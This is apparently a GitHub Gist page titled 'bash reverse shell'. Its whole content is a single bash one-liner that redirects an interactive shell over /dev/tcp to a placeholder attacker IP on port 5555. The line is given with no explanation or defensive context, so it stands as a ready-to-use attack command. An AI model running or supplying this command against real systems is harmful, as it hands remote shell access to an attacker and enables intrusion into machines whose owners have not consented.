Last active
February 18, 2024 23:08
-
-
Save yechielb2000/17385cccc8ed8cd914b7a9dadff85b82 to your computer and use it in GitHub Desktop.
bash reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bash -i >& /dev/tcp/<ip>/5555 0>&1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment